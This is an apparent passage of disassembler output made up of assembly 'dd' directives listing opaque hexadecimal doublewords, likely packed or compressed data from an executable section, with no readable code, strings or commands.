dd 41822FF2h, 768E5CCFh, 83082751h, 881EF3CCh, 53F36D35h
dd 4FC8C4DDh, 3F203394h, 0FC92CE93h, 0F3469FD3h, 5A0A7980h
dd 47B73440h, 70DE952Ah, 8D7F021Ch, 9952AC90h, 0EDE800C9h
dd 3F65843Bh, 98C40F5Eh, 0AA2D11F9h, 0CBAA3106h, 0E706AC9Eh
dd 7613EB75h, 61A71CBDh, 1D6A8DCCh, 0F5759A37h, 2E37E620h
dd 0DCB660D3h, 0CE827D6Bh, 0C4A798C4h, 7B738D51h, 422AC81Bh
dd 954C7A78h, 0A242A16Ch, 82BA9D8Ah, 72CEAD71h, 0ADD1D3B3h
dd 46E42F6Eh, 99CDDB01h, 75CA955h, 161DB681h, 23BD0112h
dd 6F423DB8h, 3EE1E28Ch, 108E3A3Ch, 25648CDh, 9CA0481h
dd 25742EF2h, 23610C99h, 728151A4h, 34DA3507h, 0DCCDCA64h
dd 0F00868A5h, 54D07CD9h, 0EEC1836Eh, 55618DCAh, 66F01C2Ah
dd 55880BFh, 6D58209Ah, 469D1F18h, 0F9978516h, 764C46D0h
dd 7A18025Ch, 16587C94h, 70909615h, 6207CBC2h, 57C2AA64h
dd 6E52B9E0h, 0E1612AC8h, 0F948E82h, 15C2AB04h, 7E11E929h
dd 0C1F9A2ECh, 2D91EDF6h, 0EEA7E56Fh, 0BE9E7018h, 81EA3F89h
dd 9037233Eh, 46C0FCFCh, 0FA9A83F2h, 61F24F39h, 9F7DBE6h
dd 0B4B2D2D3h, 0AE046B75h, 0BE8CD0F9h, 57FD8385h, 0CCAA911Bh
dd 9B882504h, 300A957Ch, 0B45158E3h, 0EE744E80h, 0F908A30Eh
dd 69E64EA6h, 5D165C5Ch, 9F4C280Ah, 0A2E34715h, 0A736F0C4h
dd 18D0DC47h, 1F171663h, 0CD26F16Ah, 2D809D8h, 638E9C27h
dd 7D127141h, 0F9807415h, 2BD72571h, 2169C475h, 3702CB3Eh
dd 8F5913FBh, 888F6413h, 0F8923DBCh, 4FE50334h, 80BC91E3h
dd 0D48F43E2h, 0AF5A6D9Dh, 8A28698Ah, 0FF306069h, 4223CAA5h
dd 46C0A518h, 8F3D70D0h, 44BD0169h, 305FB629h, 4479EB87h
dd 6FFA5346h, 0BC7AF11Eh, 4DC6304Ah, 0BA3DA845h, 7A69CA47h
dd 3B08AF55h, 0D1E8447Dh, 15CC323Dh, 38457B82h, 8F5A115Eh
dd 0FB23D984h, 0FE601555h, 0F5C22440h, 0
dd 6000h, 423000h, 5000434Ah, 0
dd 3A740000h, 259C20C4h, 0A5D31220h, 6B7D4801h, 5F2BF335h
dd 72B0D6E9h, 0F65A6629h, 0ED90DBACh, 245805CCh, 0E979A922h
dd 6BF6A152h, 9ADEB859h, 6189B75h, 580510B1h, 0D01CA044h
dd 62BBCE6Eh, 677F29DEh, 0C02FBD8Ch, 4D664422h, 0C02ED10h
dd 35762024h, 0AC76EC45h, 9ACFB0D8h, 0DAAD4B2Dh, 6DBA68B4h
dd 0B8DC76CBh, 2EB7DF70h, 0E2F394BFh, 2836BBDh, 0D1287A62h
dd 3D2242A1h, 0A5D3B46Ah, 0EA7D934Ah, 52A929B4h, 0B56A42A3h
dd 0B35AD52Ah, 3ABBBD62h, 0AAA822C0h, 0AF842C08h, 0C284B05Eh
dd 2821B84h, 90344603h, 2BC94234h, 769B2C18h, 0A1D2390Ah
dd 73FEBE99h, 2502A660h, 23D0FE2h, 0F074FD80h, 6A664060h
dd 7FC97DA2h, 8B6EA60h, 0AF509406h, 0C973AC60h, 427153B6h
dd 52BEF45Eh, 0B4D6A23Eh, 42058275h, 28086903h, 0C4C67518h
dd 56D4F6ABh, 8B9D02BEh, 7BC14E64h, 637E3EC7h, 0A9DFF942h
dd 35FF63A2h, 1B10A091h, 181D004Ah, 35A15015h, 0EB40FB31h
dd 7A713082h, 4CA85AB1h, 60EC3F62h, 42B1775Bh, 0F13E7840h
dd 80E342h, 1129060Dh, 0F6018610h, 2CACD89Fh, 2503814Ah
dd 8949180h, 2A50608Ah, 0C9426128h, 0A50CD4A0h, 9D095283h
dd 30E54A10h, 0A2CC4E85h, 143D0B47h, 830A7901h, 0A24C9628h
dd 14855114h, 0C2150903h, 869D3A6Ah, 4AA4053Ah, 4D825063h
dd 3055C315h, 0AD8C2ABBh, 5290967Ch, 4A38315Bh, 0AB3A2570h
dd 160195C9h, 2C10CC6h, 882CAD3Bh, 11921609h, 52941A76h
dd 21682C8Ah, 0B48CB3CCh, 0D3B65A43h, 0DCE6E169h, 0E9D1ED41h
dd 819820BAh, 8B32883Ah, 3E61A1A2h, 881D6865h, 0F43285D1h
dd 0FE2B18C1h, 802DB7A3h, 0F8F8276Eh, 0B81BD553h, 0A0317517h
dd 0DF18357Eh, 8159038Bh, 4340453Ah, 4E8CA1B0h, 9BB4932h
dd 4E8A02E4h, 2AB3FA0h, 0D2C00B8Ch, 0A3ACFA7Fh, 0D0ED4288h
dd 0C4DB425h, 0C252505Eh, 21DE2010h, 95ADBC24h, 4310EC9h
dd 8944D368h, 251314B0h, 946192B0h, 61084A68h, 44A32FE7h
dd 128DCA5Dh, 4A384967h, 28F2A564h, 8FA594F1h, 99544752h
dd 10B8EBh, 0C4750C4Ch, 25E8C852h, 784B9091h, 0E52EEAA1h
dd 0A4B7B095h, 12DA4257h, 4B48097Fh, 951A25FFh, 580764CAh
dd 9F40AB40h, 0A74F7A04h, 102ED388h, 85BE36Ch, 0D031081Ch
dd 65910A51h, 50848227h, 3D8FEC6Ah, 8F6EC72h, 0C92347B2h
dd 7A06451Eh, 9785D934h, 5408B8C1h, 0C9566B0Ch, 0C561954Eh
dd 0ECB7207Ah, 4B85B257h, 6FB78B19h, 38BCD2D3h, 0BBE82AC9h
dd 0A85F1154h, 0F095603Ch, 82560046h, 958D12Bh, 2550C4ADh
dd 94E112ACh, 52444A88h, 47122982h, 144AA409h, 31288C25h
dd 44882094h, 0F2214250h, 0E897A5FCh, 25DF84Bh, 558B12Fh
dd 10F84BAh, 7709C0E4h, 0D2250004h, 18966B12h, 2257984Bh
dd 8956212Ch, 0C11584ACh, 5EBC1284h, 7E4B2A16h, 0DBFBA5CBh
dd 1460DB81h, 3211027Eh, 0A7A719D0h, 4D052972h, 660194E8h
dd 17278115h, 8F654904h, 21751922h, 732A24C0h, 5004CC21h
dd 0CA0AC204h, 4650649Dh, 68CC188h, 8E1965C9h, 0A41E194Ch
dd 1A307201h, 688E730h, 391065C8h, 0A942010Ch, 1E972061h
dd 0F0030086h, 60AB3B6h, 2E644202h, 0B6F09113h, 0CB93743h
dd 80214373h, 0E44A90DCh, 71288625h, 8F6B1697h, 0D4EDAA5Fh
dd 0DF0FC00Dh, 0DE8BC40h, 0C3786BC9h, 2C9732F1h, 0BA5D0086h
dd 4376128h, 6469032Fh, 92253008h, 4A967212h, 325BC44Ah
dd 77F129h, 99F8032Fh, 0CF7DC2FEh, 0B7CC763Eh, 2442FD71h
dd 0C2C00304h, 60C288A3h, 0D706A130h, 1F1F0606h, 76A80C3Eh
dd 8E6CF920h, 0A2354EAh, 910A7E95h, 440A207Bh, 32A60D08h
dd 18A4BE08h, 0DA55A3CCh, 332E7929h, 47AA720h, 0D28896D4h
dd 9825897Ch, 0DA55C050h, 74ED4E4Ah, 77888D32h, 0D12E3197h
dd 21E2188Eh, 78089A5Fh, 0B6150A19h, 59FAD352h, 0D00F5E78h
dd 0D01F322Ah, 4D5D3E44h, 0D03AE020h, 51A79431h, 43183D03h
dd 0C9023021h, 0D9D37658h, 743957F6h, 5604102h, 42115B91h
dd 0C862CCFDh, 0E1C36359h, 27D22D50h, 6032D169h, 0B229248Ah
dd 6FA3D988h, 4DFF20DEh, 8E9A2990h, 7DBC2637h, 0CE172268h
dd 7641CE71h, 6D6E4E9Ch, 46B7F0CFh, 0B49D12BDh, 7FB28B9Dh
dd 6B1DE857h, 0FAF05F2Ch, 396E4F8Ch, 870E676Eh, 653ABE56h
dd 0DFCE82E3h, 44F6FCF1h, 58F2FF41h, 0C9D3E062h, 0AE9B982Dh
dd 0A4C793CEh, 0E8769FFFh, 0F063EF01h, 0E4DDFC6h, 93D43D38h
dd 985B1F75h, 4F395077h, 0EE1E5D56h, 8EFC6FDh, 0DEFC0BE5h
dd 7EBB771Dh, 0A343E77Fh, 0AEDEF6AAh, 0CA53D0F9h, 60643E67h
dd 44422FC2h, 0FC6BD449h, 0F8BC2FAAh, 0DF5E8B78h, 0F3FB4FD1h
dd 0D2AF9FA9h, 7D1696F0h, 0E3E4595Eh, 6D76CBCCh, 0E3D161DAh
dd 0A7A28233h, 0AE07D1A1h, 0EDC9F0CBh, 6B140C52h, 9F27A453h
dd 0CD772F26h, 6D4C399Dh, 2D761B2Fh, 287BF1BFh, 0C9567BC5h
dd 34DF179Eh, 8381BFE6h, 0E3260D0Ch, 8FF754D2h, 27D8F61Eh
dd 713F175Ah, 9F5592D7h, 7CE49EDDh, 172095FCh, 16EFBFDh
dd 7379F777h, 2A05A672h, 71247906h, 0F18152B0h, 10C0B755h
dd 7F713980h, 0BAFA27EEh, 0B7E9EC2h, 0AC933B80h, 3F1B0ED6h
dd 44B0BEFDh, 0BC3E97B7h, 0CB197F53h, 22FB9CB2h, 0C4EFF156h
dd 23C27E8Fh, 64F5421Fh, 3FB851E3h, 4DB69C5Dh, 35F0ED03h
dd 0DF0DB4DBh, 339E5DECh, 57AFEB3Bh, 29BFEF28h, 0CEF02F57h
dd 0B9D6EB79h, 46EFBFA4h, 0F90E1C24h, 95BFCCD5h, 89BECBE9h
dd 7CDC0D37h, 2335CA65h, 0D68993B9h, 1FCD39DDh, 0F7ACCD8Ah
dd 0A4E66BCEh, 8F6CFBACh, 0EC98BADh, 6F1679E6h, 3B98247Ch
dd 77A3F375h, 0B59ED871h, 6353A56Ah, 0B7750DFBh, 7F74BE44h
dd 6DFF3BDh, 0B15FBF1Bh, 240964B0h, 3392DD10h, 55FFE97Dh
dd 377D927Fh, 7C9B512Ah, 0F28DD668h, 0D567CB25h, 0DC1BD0EEh
dd 0AA5DD63Bh, 0FC8E9923h, 53F5F07Fh, 0DEAC067Ah, 1CC73A8Ch
dd 9E48725Ah, 19C681ACh, 97DC713Dh, 0F5E70A8Fh, 456211FEh
dd 0D8FA7DCCh, 6D34111Bh, 1B093C78h, 41F60CEFh, 0ACDF45A1h
dd 9D4CD99Bh, 0CE94B72Eh, 0CBDDEE31h, 56A78CCCh, 3EFB49C8h
dd 0ED693A6Ch, 745B8157h, 8AD17046h, 0E9EA5997h, 2567B288h
dd 964959FAh, 496C6F10h, 4FA9693Eh, 0D6B3DA69h, 0CC13EBB9h
dd 0EF7098FAh, 0BF4749C0h, 9EF3AFBFh, 557C1A3Dh, 7F50E22Bh
dd 0A3148CF3h, 96C5C1C8h, 8FD7EA5Dh, 97D8FD33h, 77B3C1B2h
dd 9722885Ch, 0D376FCEEh, 90BB09DDh, 0A3DE1D11h, 0E72EDE84h
dd 6C110214h, 0E1613F31h, 0ECCC7CF5h, 47B74D4Fh, 9FD91533h
dd 643F42A6h, 0E8FB785Ah, 0D2BA5ABDh, 621591Ah, 364A008Ch
dd 0F7F0F90h, 8C5340A3h, 0E976E490h, 3F7C6FC9h, 1FA167D3h
dd 2AE4D24Bh, 0C03F8301h, 9155BEC2h, 4A44EE58h, 8A015202h
dd 1FF8AAAh, 2A09646h, 0C03FD080h, 67219C8h, 0FE8AFA28h
dd 0CC03B00Fh, 8067019Ch, 0FFE8FFA2h, 0CB43B00h, 0FE8A4150h
dd 0A601B00Fh, 40320196h, 3FFAFFD1h, 5B18D6C0h, 0A0922806h
dd 0A1B10554h, 42DAF5C1h, 0C9C108F5h, 1D9F4A67h, 0A493FA76h
dd 0C0DC713Bh, 8357E95Bh, 0FD7E27Ch, 1E9AFC3Eh, 9CA9FCF1h
dd 5E26CF2h, 39EB012Ch, 4AF06FB9h, 0A078F67Fh, 632189D4h
dd 0F04D2D87h, 13CA0CC3h, 7ED397F4h, 31AD73A8h, 0C95D3869h
dd 0E7C6FC7Ah, 0AE4C2BF3h, 733536B8h, 0EBF76F29h, 80F68DADh
dd 0A1F5B3C0h, 0CCBF21E1h
dd 6CE56690h, 90ED16FDh, 0C7E6FD7Eh, 0BF827F6h, 0AA7C85FAh
dd 0D5FAE879h, 97423311h, 61E7DFAh, 0C375BC7Eh, 0E6F02F09h
dd 535DF264h, 6D74F8CFh, 8572B1A6h, 55C05A1h, 257BF8DCh
dd 4CD4CC4Bh, 335EF9E2h, 0D2EF4ED4h, 0ECEF1A4Ch, 0C6C785CEh
dd 9EDDB788h, 63D84D8Eh, 53362506h, 5716A967h, 3425678h
dd 2A675428h, 0AE99BDECh, 7711ED66h, 0D9DBEDE7h, 0A4DAE071h
dd 0B2E9FAC6h, 67CCFF7Dh, 806551B7h, 7E79EA7Ah, 0F3982DC8h
dd 8852C975h, 0D8CD950h, 0D01CA2F6h, 0DFC57E0Dh, 11C0031h
dd 67867C62h, 1F86F550h, 2F297AF9h, 2A6CCE1Dh, 62933B2Bh
dd 536CC2E9h, 2945CF75h, 0E596DD4Eh, 5FEAD1D1h, 69BC3B94h
dd 0AD1876D5h, 0D2DE6F73h, 111564F1h, 84A8B667h, 1317C300h
dd 0EE6CCCDEh, 41152D11h, 0F7347A82h, 0C7605070h, 0CDE84143h
dd 8706E090h, 0BDF64866h, 0C027153h, 0B5803368h, 0D9F488B5h
dd 0B5CA5DD5h, 5C47B1A1h, 0FFFBFCBEh, 0A21103C4h, 0C504C992h
dd 0D83DC22Eh, 4158A9D4h, 4D000EA6h, 8086753Eh, 2E420F1h
dd 497C8EBh, 28661210h, 211B8F80h, 67C43EA0h, 89530719h
dd 25680427h, 95E112AEh, 58844AE0h, 67122BE2h, 0B04BB289h
dd 0E12DD425h, 4B86896h, 12EAE25Ch, 4BC88973h, 2FE225DCh
dd 921197C1h, 948508Fh, 253004A3h, 95011294h, 55044A70h
dd 58122A42h, 744AAB09h, 112CB625h, 44B3F896h, 12D66259h
dd 4B688969h, 2E6225B0h, 0BC099701h, 0FA255D84h, 8FCD7B12h
dd 5144F848h, 49120862h, 344AA389h, 12A9625h, 84A97895h
dd 12AA2254h, 4AC08954h, 2B822558h, 0B00995A1h, 0C6255784h
dd 30966212h, 425A904Bh, 896E812Dh, 25C8C4B6h, 976112E0h
dd 5E444BA0h, 7D122EE2h, 948ABD89h, 32040146h, 4C12A402h
dd 3C4AA509h, 212A9C25h, 84AC8095h, 12C08255h, 4B20895Dh
dd 2D622588h, 0B9099671h, 0E8255B44h, 0B8977312h, 8911D84Bh
dd 84A8122h, 5128FAA1h, 44A51894h, 129CE252h, 4A88894Ch
dd 2AA2253Ch, 0AC899531h, 0BA2555C4h, 10965A12h, 6A4804Bh
dd 7C804120h, 97C17D94h, 0E10B4790h, 44A62B47h, 8C89C25Ch
dd 30167C9Dh, 7615D0AFh, 0C1FAB8A0h, 2F988A91h, 0E297FFDEh
dd 0A3C07130h, 0A98B348Ah, 0A5D0C76h, 881FBACFh, 62ED26B7h
dd 80C4D6ACh, 75A52001h, 687EA4D0h, 2858BB73h, 4238FA29h
dd 6C0FA4BAh, 0F5FB3CB8h, 0FBAFB540h, 8B27E77Dh, 0DDB39EBDh
dd 52C0243Dh, 81681786h, 0DC5E9238h, 0E56C2132h, 0EDD21DD6h
dd 7244B6DBh, 0AAE5EB21h, 96F06873h, 381654D5h, 2604C76h
dd 8B2C481Dh, 8E66A19h, 211E0197h, 0A4DB407h, 2F80B848h
dd 0CAEF31A5h, 0E877313Ch, 8477F1D4h, 1988B3D1h, 6492B98Ch
dd 0A1952149h, 0E6D17867h, 0C3D1A86Fh, 5C5DA97Dh, 0FCC66F05h
dd 4D085249h, 17F5D4B7h, 0E9554C9h, 63FD9C2Ah, 7A0DDDFEh
dd 58908A87h, 0F9DEB18Bh, 0A280DFFBh, 20340B07h, 7D1609B5h
dd 903933D7h, 0C09E02h, 81016123h, 0E73A7CA1h, 0C493A12Ah
dd 0C50EA303h, 80A2893Eh, 0E7F01560h, 77D6134h, 1A124346h
dd 804394D4h, 0D8FBB440h, 0D7E4FB5h, 0B4D9F45Ah, 6B0CE35Dh
dd 5B6A6909h, 7FDD1D36h, 4DE04580h, 0F1E0484Ch, 0C06D29CFh
dd 0A7D750D3h, 0FFAAA835h, 0DB3D3C05h, 0A9BD6DB5h, 50756E94h
dd 0F7F94EE3h, 42DE01Fh, 9D2EE020h, 0A217146Ah, 0A905DD69h
dd 0CED9B95Dh, 0D53C6D66h, 0F9455A13h, 0F4CA44B0h, 0E649213Fh
dd 0D2EF6489h, 947530C7h, 76566E5h, 0EE36CF5Eh, 617FA4DCh
dd 0DAD6BA8Dh, 345B7942h, 27B407Fh, 9A823D90h, 82C9C430h
dd 6223EFDh, 5B51E498h, 7CFC8FB6h, 268BAFF9h, 37B5392Dh
dd 298D69B3h, 0A596DC01h, 0DA10B993h, 0D8EC4CF7h, 0A76A0230h
dd 0FBF7048Eh, 274B63h, 0A34A12DBh, 0AFD0BCE6h, 436A4B49h
dd 0AED66980h, 0BA8D7745h, 0F93D7BB5h, 65141ECCh, 0C613C193h
dd 29F1E4EFh, 0FB7DE987h, 2DF9F992h, 25F74D94h, 423BF0h
dd 1233383h, 60C0F87Ch, 0F238C4BEh, 3ED86B09h, 0D0A00A05h
dd 3EA75C17h, 8435660h, 9B34CD97h, 1CFF674Fh, 23085C96h
dd 9C19CD47h, 0C41C0F9Fh, 0F1535C2Fh, 0F00A0160h, 0C406039h
dd 41144144h, 8130FC0Ah, 309F262Ah, 2C181805h, 365432D8h
dd 1EFB3E19h, 4048A058h, 227A0341h, 2A98FCABh, 0C847BA2Ch
dd 0DFE47FA2h, 0CA2E4B7h, 2FAA4CBEh, 9D419D21h, 730BC3B2h
dd 2020436Ah, 26A72018h, 5FE58B0h, 5F01A001h, 2B06C496h
dd 0A3097166h, 0A20D5966h, 22A18258h, 0E2B0025Fh, 62A3907Fh
dd 864A9859h, 2B3E0614h, 1B41FE56h, 0B1C006CBh, 12866350h
dd 6350C03Ch, 700351h, 27AE0Fh, 5C1548CEh, 263EE7E0h, 93604220h
dd 3F11BF6Fh, 13E2AB6h, 0F39682C5h, 61324700h, 6231650Ch
dd 9316C24h, 0A62DF866h, 381CC9D8h, 186B4C5Eh, 46C8009Fh
dd 19730B84h, 332CE4F1h, 0CB61D92Ch, 2A773512h, 7B75B948h
dd 8E749B69h, 6F03D0DDh, 9B736E8Dh, 276883C0h, 365A2F49h
dd 0B7593176h, 0C59D96Fh, 0D575CBD9h, 0B018186h, 17B4B9DDh
dd 5258E028h, 4A065A41h, 0CA020387h, 0B864E5AEh, 6B48B6CBh
dd 28040101h, 723F3231h, 5000071h, 0F79B672Eh, 0AD926815h
dd 25047DD4h, 7CA1CA31h, 0B0BBC6DAh, 687790BCh, 0CE64A52Ch
dd 1A300102h, 683CE029h, 0D6C22481h, 1A1696B2h, 2E524130h
dd 0E0B2BA8h, 0E2544554h, 2C045BADh, 660B5AE1h, 1D015B18h
dd 2E358594h, 530182C9h, 0DB1D5029h, 0EC374A31h, 8301AC62h
dd 103256h, 85A6E059h, 82B9B80Dh, 0C3ADC21Dh, 8512531Ch
dd 17231E06h, 7708DE03h, 9B9BA081h, 8902C2B6h, 2D9651B5h
dd 86844150h, 0B58D6B09h, 0B88B4170h, 1A5A25DDh, 0F09833BAh
dd 429145F9h, 0CC44100h, 0A0085303h, 0E86E150Dh, 25FCEA20h
dd 84112F6h, 30104A29h, 0A965DEB3h, 9E841012h, 0D574F955h
dd 0E0114751h, 0F83C24F7h, 0AEF38ECDh, 0B4275A36h, 35F863C7h
dd 2623EF6Ah, 4213ABEFh, 596ABEFAh, 95FDF7A8h, 7AC94E7Eh
dd 9C2C9BFDh, 0D9C8FBDEh, 934FD225h, 0C08994A0h, 1F97DEF5h
dd 0E601C17Dh, 844973CDh, 84FADDC6h, 58ED642Eh, 6DBE949Ah
dd 2F65973Ah, 0A5E6C975h, 6EB3A03Eh, 15F2C089h, 56F2DD2Dh
dd 263F722h, 6FB36ABFh, 6C3E102Dh, 2CFADA6Ch, 3EB0E310h
dd 6169F1Fh, 0E7DC7CFh, 5B2AFB1Bh, 209F6DB2h, 944AB50Ah
dd 7949B0C6h, 11DA6316h, 0A730A855h, 46AA934Ah, 0D98AC2E5h
dd 48AA52A8h, 525580C3h, 461C12A8h, 34267ECAh, 0CF9EDAA7h
dd 0A79F760h, 0DD190303h, 0C36B4EB2h, 871F1D98h, 0C198CDCDh
dd 0E6D31511h, 38342A4Eh, 0E2B18BCCh, 8A011330h, 2EA2521h
dd 1000222Ch, 0FAE1h, 80000000h, 434A0043h, 1000h, 0
dd 20F33010h, 32289FF4h, 0A78063B4h, 1184605h, 8533D094h
dd 11842601h, 0D2D765B9h, 5B8A5B26h, 73297590h, 0B1261228h
dd 0F65BA536h, 0DE7EEA7Ch, 0C522C36Eh, 542F414h, 4A65BCE9h
dd 0C2B69B15h, 0C8B93BCDh, 5892A81h, 0CB7D8CEDh, 90917377h
dd 324C7051h, 6F169057h, 6114AB5Ah, 4F5D2EB6h, 1B650458h
dd 141843Ah, 8C190485h, 29A52B00h, 8DC12C2h, 25944B48h
dd 930C3A00h, 35D6E6D5h, 0A355394Dh, 1A5B0D9Ch, 0B50ADF78h
dd 6934FA04h, 8952ADC8h, 0F8C03EFBh, 0EE112200h, 2 dup(0)
dd offset loc_439000
dd 1E64434Ah, 2, 0E5180000h, 13D120E2h, 6A633E04h, 774EFFFFh
dd 225F30FCh, 0AB804701h, 0FFFD071Ch, 0EB18C7A7h, 4799F653h
dd 0F0781F07h, 5C89EBCFh, 0DD6D11D3h, 6550E73Fh, 0E07C2E6Bh
dd 9B6FFE70h, 0C08C5020h, 98E7609Bh, 0E9782543h, 2F7A0066h
dd 0D2B3A8DAh, 0F5B97DBFh, 597F81E0h, 7D3473CAh, 0E4CD0FDAh
dd 38B0A197h, 897B767Ah, 23913C7Fh, 0A7237861h, 0C3C1CB09h
dd 85601129h, 0A5700533h, 1A01AE76h, 0DBC5FA1h, 151413BFh
dd 0FB65066Bh, 7C1D01B5h, 129F2D17h, 563F3284h, 0CD7609CFh
dd 0E87C00Ah, 0B6C24B85h, 0D605E166h, 5BD72443h, 7F135B01h
dd 25F0E92Fh, 7A3A7306h, 2AF88E60h, 79FE0B3Fh, 92B7083Ch
dd 71281CF4h, 768EA3A2h, 8A176478h, 2E4A45F2h, 0D4FB3FEFh
dd 0E40E1F89h, 9E498398h, 5C5F9187h, 22872BF5h, 7CBBA2D1h
dd 337BC2E4h, 4C178518h, 0A091129Ch, 0DA7B49D0h, 0D1FDC697h
dd 63AC362h, 0C0FAD7D1h, 3DFFB9DEh, 88B2A1Eh, 8D0F85BBh
dd 0BED16F16h, 30E5A639h, 3100F1DAh, 61F36BB9h, 0D0B26090h
dd 9E5FBDE0h, 666D6E42h, 9502D596h, 3CA15AEh, 0B4D99A57h
dd 2A9CD670h, 0D11B62FFh, 4707DAA3h, 287C18D6h, 8F407DFEh
dd 0EDFF6149h, 0A0A2B817h, 0E46282B2h, 0CC59B51Bh, 162868BFh
dd 82674F20h, 4032A06Ch, 0AB67106Dh, 8F7D4958h, 5EC02D11h
dd 47700383h, 3C68FBA2h, 0ECF590B3h, 4772D834h, 7C8D750Bh
dd 67C64032h, 0B4D06A89h, 0FBF285BAh, 0FF9B1086h, 8B5350A2h
dd 0DEAAF51Fh, 8BDE061Bh, 17C21F82h, 1C8105F2h, 0D97F035Bh
dd 0A7994584h, 0F36003B6h, 0FC9D6994h, 5FCF7C5Bh, 41654A32h
dd 43A6F3BFh, 980820B3h, 51A1C3F0h, 5FB21404h, 0A387776Ch
dd 3D00A453h, 450F8A49h, 6F226863h, 0B128C056h, 35573005h
dd 0EA181EEAh, 0A3D6E261h, 12C6BE15h, 6AF3A1EBh, 8B6CD985h
dd 0E5D90C4Ah, 0CA440A0Ah, 606D4816h, 2B4E3164h, 1B949036h
dd 858BCCFEh, 0F8FDE474h, 0CD20FD6Ah, 0AB21A553h, 0B104CE6Dh
dd 5F573F81h, 69B94FF2h, 7CFFB450h, 0D0C64B8Dh, 0FDED3EF1h
dd 0EC4C76CBh, 30C3D76Ch, 5F321D64h, 0DD39EACh, 65CB6BCAh
dd 47424213h, 55B1067Ch, 1343A512h, 44547F03h, 0AB181C1Eh
dd 0A5981D79h, 0D7002298h, 74511D6Fh, 468DA0F3h, 641BB1D6h
dd 62EB2453h, 8A340EADh, 0E0351042h, 3735D59Ch, 0FF027FA1h
dd 0EF2C19E9h, 0C16A78Bh, 83111702h, 378379B8h, 0EF136DE4h
dd 415D9F01h, 1F68F4D0h, 145C266Fh, 0C91FEDC2h, 0C3A96BB9h
dd 7B093617h, 4C335A28h, 0D571FF8Dh, 1C1EE5B1h, 0F4A8272Ah
dd 395CC95Eh, 0A38358EAh, 0EED43A8Dh, 7C8A03A0h, 9398A4B1h
dd 73E5C607h, 0E87FFEDBh, 0F3DF830h, 2F745A80h, 0BA85DF0h
dd 0F9D02B05h, 38008C9Eh, 0A58126A9h, 6D78AE87h, 7FDDF9E4h
dd 4B87C911h, 662E3EB5h, 9E5E822Eh, 171C3432h, 0A38D1E58h
dd 0B53ADAEDh, 0CD64C1A1h, 6A476C25h, 449B7323h, 0A55A3555h
dd 0C06AFD69h, 18A224FDh, 2C8D245Eh, 84A7095Dh, 89FE208Dh
dd 5673871Ch, 53A496F9h, 0D727350Bh, 88B67F60h, 3E25188Bh
dd 71819AA6h, 0AF0141D6h, 0BCE050BEh, 0C3DBC761h, 33FC84BFh
dd 0E05269B2h, 29F00FA2h, 0FB587BA6h, 0AA07F66Bh, 510B6729h
dd 2FA737EDh, 7E789A84h, 1E1EE0B4h, 4744D7EDh, 0FAA118D2h
dd 62A02A76h, 0DC19C8B5h, 38672893h, 267D04E1h, 0A956E07Dh
dd 108391E8h, 88B4105Bh, 0ECD8216Bh, 23A82372h, 0F3F21F5Fh
dd 0BAA8B439h, 0B60A49EEh, 0E2331F2Eh, 59A0252Ah, 139A59B4h
dd 90B3579Dh, 1B4A451Ah, 885F2834h, 0ECEC86DEh, 0B46C1ACh
dd 0B83CA381h, 79D8ED7h, 0CE356886h, 7CE857A9h, 0B5605CDh
dd 60E5185Ah, 0EA5040C2h, 0DE4C5717h, 36F75202h, 1C40D42Eh
dd 33D60B35h, 0A8EF1441h, 0B6B00100h, 62973AD2h, 68B44FC4h
dd 4E646F53h, 60784DA5h, 0ACFF20CEh, 8156529Ah, 2157EF89h
dd 0F6019BF5h, 0DEFFD100h, 0FAC6095Eh, 4FEE3DFAh, 90460216h
dd 6FB2A929h, 0A83AAE3Ch, 0BCB61EA6h, 0F9E55940h, 99A3FE69h
dd 0F07888A0h, 0E9AF1FE1h, 9A5BF131h, 223C5A33h, 17DA5684h
dd 468F5B2Ch, 4A4DFADBh, 5BBDEA88h, 0EEE43201h, 7280D703h
dd 4754F0BAh, 11C22DFFh, 4D4E122Bh, 10AF289Dh, 0A38DE2DFh
dd 416B7745h, 9E8B03A0h, 69F24F4Dh, 0CC357838h, 1AE661BFh
dd 0C0125E1Eh, 591ABE13h, 9FBB8C7Dh, 0FF60D060h, 5291B558h
dd 0D98078F0h, 25E8EEE2h, 0E8DD62FFh, 85D066F4h, 2BFCCD52h
dd 3B4310CDh, 4FBF387Eh, 3EEFB618h, 5F7608C5h, 0CDFE6711h
dd 0E62D5F03h, 22AC159Bh, 99264440h, 3B8113Dh, 3F621782h
dd 2FD69F71h, 7F329AB6h, 9F36A362h, 77E3C249h, 0B4E04512h
dd 3C33986h, 0F5860543h, 75A1DF79h, 36D173ABh, 5CB32B86h
dd 0F9BBAA3h, 0C1F115ECh, 95539D3h, 0E66C9C7Ch, 5204166h
dd 0A7FE3632h, 0D1F497Fh, 5FE37338h, 28F4E909h, 0B2DD03BDh
dd 74759169h, 9F36E86Dh, 94863B02h, 965288A9h, 4E842EA5h
dd 2E19BFBFh, 4B1A8FA6h, 0EB641A05h, 26192DFFh, 4B0B8CFFh
dd 53D325E6h, 1F06FC6Dh, 3E1CF2D8h, 0ED19B212h, 9688DAD0h
dd 0F276D6D6h, 650F2A4Dh, 3F260B5Ch, 19B86219h, 93B6FE9Eh
dd 51C57A0Bh, 0D5BF27A1h, 0E9E8F39Bh, 6C34D368h, 0D51A2DD1h
dd 65C09D72h, 6AC288E7h, 0FF9F9486h, 0AA7674F4h, 0A6333EDFh
dd 306D908Eh, 7DC35829h, 0C717E1CFh, 0AD553FBEh, 2E6AF464h
dd 0CB32A988h, 8767FB1Fh, 25E0D834h, 0EF1F98BAh, 5C90C7E0h
dd 311CC823h, 0A8881EF1h, 0EB73DBE1h, 0B649D5Dh, 98D2127Eh
dd 0A102B513h, 2E02C943h, 0DA04CF1Eh, 0ABD9BBCCh, 12218B78h
dd 0BF647D49h, 0D3D20FF5h, 0BA653E51h, 87948A54h, 0B25CC68Dh
dd 34FE52A2h, 3FD35490h, 6F173670h, 32F5B25h, 3E1745F8h
dd 86BE4FE6h, 3E914CCFh, 2C8A3D05h, 8ABCEAA6h, 0AE949D09h
dd 0C97E227Fh, 94E04398h, 6D52E40Bh, 0E36609AAh, 14199996h
dd 875E2FABh, 0A68A3826h, 7A7525A7h, 80CA0896h, 9D924B12h
dd 44FA6D7Dh, 0EE2BFCE8h, 0A30E525Dh, 0BFA16273h, 5389ABFDh
dd 46B99B9Eh, 552727BEh, 68E42D30h, 0AD5C3BEh, 0B25B0FD1h
dd 6415F9F3h, 68E5904Dh, 31A3B260h, 0F816D06h, 72400FE6h
dd 0E8B03C54h, 83396997h, 0B5088781h, 4D12627Bh, 6FDCBC2Ch
